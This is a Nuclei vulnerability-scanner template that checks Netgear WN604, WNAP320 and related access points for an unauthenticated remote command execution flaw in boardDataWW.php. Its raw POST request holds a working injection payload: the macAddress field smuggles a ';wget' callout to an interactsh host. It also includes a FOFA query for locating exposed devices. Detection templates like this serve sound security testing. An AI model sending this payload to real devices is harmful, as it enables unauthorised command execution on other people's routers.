nuclei-templates/http/iot/netgear-boarddataww-rce.yaml

43 lines
1.4 KiB
YAML

id: netgear-boarddataww-rce
info:
name: Netgear Devices boardDataWW.php - Remote Command Execution
author: pussycat0x
severity: critical
description: |
boardDataWW.php in Netgear WN604 before 3.3.3 and WN802Tv2, WNAP210v2, WNAP320, WNDAP350, WNDAP360, and WNDAP660 before 3.5.5.0 allow remote attackers to execute arbitrary commands.
reference:
- https://github.com/wy876/POC/blob/main/Netgear%E8%B7%AF%E7%94%B1%E5%99%A8boardDataWW.php%E5%AD%98%E5%9C%A8RCE%E6%BC%8F%E6%B4%9E.md
- https://github.com/gobysec/GobyVuls/blob/master/Netgear_Devices_boardDataWW.php_Unauthenticated_Remote_Command_Execution.md
metadata:
verified: true
max-request: 1
fofa-query: title=="Netgear"
tags: rce,netgear,iot,unauth
http:
- raw:
- |
POST /boardDataWW.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23&reginfo=0&writeData=Submit
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: body
words:
- "<title>Netgear</title>"
- type: status
status:
- 200
# digest: 4a0a00473045022100f155a94a54503da5deb6ff296b834f282eaf04979d15a1cdb961e8ca5dfc40eb022046f9caa3ae3c3b946928cb46d3324b557eca2d4b174bc6ac0cb2606547ada161:922c64590222798bb761d5b6d8e72950